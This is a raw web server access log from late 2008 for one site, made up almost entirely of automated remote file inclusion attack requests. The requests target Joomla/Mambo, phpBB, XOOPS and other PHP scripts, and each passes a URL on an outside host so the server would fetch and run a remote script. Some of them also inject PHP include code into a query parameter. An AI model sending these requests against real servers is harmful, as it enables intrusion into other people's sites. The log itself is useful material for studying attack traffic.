74.53.60.72 - - [29/Nov/2008:08:00:04 -0800] "GET /logs//Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://www.nord-radio.com//votingpoll/sex.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.60.72 - - [29/Nov/2008:08:00:04 -0800] "GET /Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://www.nord-radio.com//votingpoll/sex.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.60.72 - - [29/Nov/2008:08:00:14 -0800] "GET /logs//Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://www.nord-radio.com//votingpoll/sex.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.60.72 - - [29/Nov/2008:08:00:14 -0800] "GET /Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://www.nord-radio.com//votingpoll/sex.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:00:22 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.154.159.237 - - [29/Nov/2008:08:00:22 -0800] "GET /logs/access_080410.log//?path%5Bdocroot%5D=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
202.154.159.237 - - [29/Nov/2008:08:00:22 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 200 75743 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:00:22 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.154.159.237 - - [29/Nov/2008:08:00:23 -0800] "GET /?path%5Bdocroot%5D=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 200 94907 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:00:23 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://gxmag.com/poll/id????? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:00:23 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://gxmag.com/poll/id????? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:00:23 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:00:24 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.60.72 - - [29/Nov/2008:08:00:33 -0800] "GET /logs/access_080809.log//Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://www.nord-radio.com//votingpoll/sex.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.60.72 - - [29/Nov/2008:08:00:34 -0800] "GET /Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://www.nord-radio.com//votingpoll/sex.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.60.72 - - [29/Nov/2008:08:00:34 -0800] "GET /logs//Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://www.nord-radio.com//votingpoll/sex.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.60.72 - - [29/Nov/2008:08:00:34 -0800] "GET /logs/access_080812.log//Orca-2.0.beta2/layout/default/params.php?gConf[dir][layouts]=http://www.nord-radio.com//votingpoll/sex.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.162.85.6 - - [29/Nov/2008:08:01:03 -0800] "GET /logs/access_080401.log//include/print_category.php?setup[use_category]=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.162.85.6 - - [29/Nov/2008:08:01:06 -0800] "GET /logs//include/print_category.php?setup[use_category]=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.162.85.6 - - [29/Nov/2008:08:01:06 -0800] "GET /include/print_category.php?setup[use_category]=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.162.85.6 - - [29/Nov/2008:08:01:06 -0800] "GET /logs/access_080513.log//include/print_category.php?setup[use_category]=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.154.159.237 - - [29/Nov/2008:08:01:12 -0800] "GET /logs/access_080513.log//?path%5Bdocroot%5D=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:08:01:41 -0800] "GET /logs/access_080919.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:08:01:41 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:08:01:41 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.23.236.98 - - [29/Nov/2008:08:01:41 -0800] "GET /logs/access_081117.log//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.geocities.com/tunis_23/idperkosa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.23.236.98 - - [29/Nov/2008:08:01:41 -0800] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.geocities.com/tunis_23/idperkosa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.23.236.98 - - [29/Nov/2008:08:01:42 -0800] "GET /logs//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.geocities.com/tunis_23/idperkosa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.239.45.184 - - [29/Nov/2008:08:01:45 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.0" 200 95066 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.82.133 - - [29/Nov/2008:08:01:54 -0800] "GET /logs/access_080703.log/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.22.82.133 - - [29/Nov/2008:08:01:54 -0800] "GET /logs/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.22.82.133 - - [29/Nov/2008:08:01:54 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 200 95075 "-" "Mozilla/5.0" "www.dmulk.com"
64.22.82.133 - - [29/Nov/2008:08:02:33 -0800] "GET /logs/access_080518.log/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.215.243.76 - - [29/Nov/2008:08:03:06 -0800] "GET /logs//ak07//pixlie.php?root=http://geocities.com/blade_tea/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.215.243.76 - - [29/Nov/2008:08:03:06 -0800] "GET /ak07//pixlie.php?root=http://geocities.com/blade_tea/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.215.243.76 - - [29/Nov/2008:08:03:06 -0800] "GET /logs/access_071028.log//ak07//pixlie.php?root=http://geocities.com/blade_tea/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.138.166 - - [29/Nov/2008:08:03:15 -0800] "GET /logs//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.138.166 - - [29/Nov/2008:08:03:15 -0800] "GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:03:37 -0800] "GET /logs/access_080930.log/index.php?go=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:03:40 -0800] "GET /logs/access_080930.log/index.php?go=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:08:03:44 -0800] "GET /logs/access_081007.log/browse.php/header.php?prefix=http://www.geocities.com/hidayatkhoir/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.82.133 - - [29/Nov/2008:08:03:56 -0800] "GET /index2.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.22.82.133 - - [29/Nov/2008:08:03:56 -0800] "GET /logs/access_080401.log/index2.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.22.82.133 - - [29/Nov/2008:08:03:56 -0800] "GET /logs/index2.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:08:04:05 -0800] "GET /logs/access_081102.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:08:04:06 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 200 95131 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:08:04:07 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
121.162.85.6 - - [29/Nov/2008:08:04:09 -0800] "GET /logs/access_080421.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.162.85.6 - - [29/Nov/2008:08:04:09 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.162.85.6 - - [29/Nov/2008:08:04:09 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.162.85.6 - - [29/Nov/2008:08:04:11 -0800] "GET /logs/access_080307.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:04:13 -0800] "GET /logs/access_080224.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:04:13 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:04:14 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:04:14 -0800] "GET /logs/access_080530.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:04:15 -0800] "GET /logs/access_080530.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.154.159.237 - - [29/Nov/2008:08:04:16 -0800] "GET /logs/access_080404.log//?path%5Bdocroot%5D=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:04:19 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.82.133 - - [29/Nov/2008:08:04:36 -0800] "GET /logs/access_080703.log%20%20/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.22.82.133 - - [29/Nov/2008:08:04:36 -0800] "GET /logs/access_080518.log%20%20/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:04:41 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:04:41 -0800] "GET /logs/access_080224.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:04:43 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:04:43 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:04:44 -0800] "GET /logs/access_080224.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:04:44 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:04:44 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.65.42.208 - - [29/Nov/2008:08:04:48 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
69.65.42.208 - - [29/Nov/2008:08:04:48 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
69.65.42.208 - - [29/Nov/2008:08:04:49 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
202.154.159.237 - - [29/Nov/2008:08:04:52 -0800] "GET /logs/access_080404.log//?path%5Bdocroot%5D=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:08:04:53 -0800] "GET /logs/access_081003.log/kmitaadmin/kmitam/htmlcode.php?file=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:04:57 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:04:58 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:04:58 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://gxmag.com/poll/id????? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:04:58 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://gxmag.com/poll/id????? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:04:59 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:04:59 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:08:05:01 -0800] "GET /kmitaadmin/kmitam/htmlcode.php?file=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:08:05:01 -0800] "GET /logs/kmitaadmin/kmitam/htmlcode.php?file=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.154.159.237 - - [29/Nov/2008:08:05:04 -0800] "GET /?path%5Bdocroot%5D=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 200 94891 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:05:06 -0800] "GET /logs/access_080930.log/index.php?go=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.154.159.237 - - [29/Nov/2008:08:05:08 -0800] "GET /logs/access_080226.log//?path%5Bdocroot%5D=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
202.154.159.237 - - [29/Nov/2008:08:05:09 -0800] "GET /logs/access_080226.log//?path%5Bdocroot%5D=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:05:15 -0800] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:05:17 -0800] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.69.192.200 - - [29/Nov/2008:08:05:24 -0800] "GET /logs/access_081031.log//galeria.php?start=0&kategoria=http://you-buy-viagra.com/files/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.200 - - [29/Nov/2008:08:05:24 -0800] "GET /galeria.php?start=0&kategoria=http://you-buy-viagra.com/files/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.69.192.200 - - [29/Nov/2008:08:05:24 -0800] "GET /logs//galeria.php?start=0&kategoria=http://you-buy-viagra.com/files/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:08:05:25 -0800] "GET /logs/access_080509.log/kmitaadmin/kmitam/htmlcode.php?file=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.69.192.200 - - [29/Nov/2008:08:05:31 -0800] "GET /logs/access_080919.log//galeria.php?start=0&kategoria=http://you-buy-viagra.com/files/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.154.159.237 - - [29/Nov/2008:08:05:32 -0800] "GET /logs/access_080404.log//?path%5Bdocroot%5D=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
202.154.159.237 - - [29/Nov/2008:08:05:34 -0800] "GET /logs/access_080404.log//?path%5Bdocroot%5D=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
202.154.159.237 - - [29/Nov/2008:08:05:45 -0800] "GET /logs/access_080226.log//?path%5Bdocroot%5D=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
66.40.52.25 - - [29/Nov/2008:08:06:41 -0800] "GET /logs/access_080703.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.seanbatt.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.40.52.25 - - [29/Nov/2008:08:06:41 -0800] "GET /logs/access_080518.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.seanbatt.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.40.52.25 - - [29/Nov/2008:08:06:41 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.seanbatt.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.40.52.25 - - [29/Nov/2008:08:06:41 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.seanbatt.com/id.txt????? HTTP/1.1" 200 95031 "-" "libwww-perl/5.800" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:06:52 -0800] "GET /logs/access_080831.log//?sIncPath=http://web8.server5.northern-solutions.de/klinken/modules/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:06:53 -0800] "GET /logs//?sIncPath=http://web8.server5.northern-solutions.de/klinken/modules/id.txt?? HTTP/1.1" 200 75743 "-" "Mozilla/5.0" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:07:10 -0800] "GET /?sIncPath=http://web8.server5.northern-solutions.de/klinken/modules/id.txt?? HTTP/1.1" 200 94851 "-" "Mozilla/5.0" "www.dmulk.com"
65.55.211.28 - - [29/Nov/2008:08:07:25 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.28 - - [29/Nov/2008:08:07:27 -0800] "GET /logs/access_080325.log HTTP/1.1" 200 1835008 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
69.65.42.208 - - [29/Nov/2008:08:07:52 -0800] "GET /logs/access_081027.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
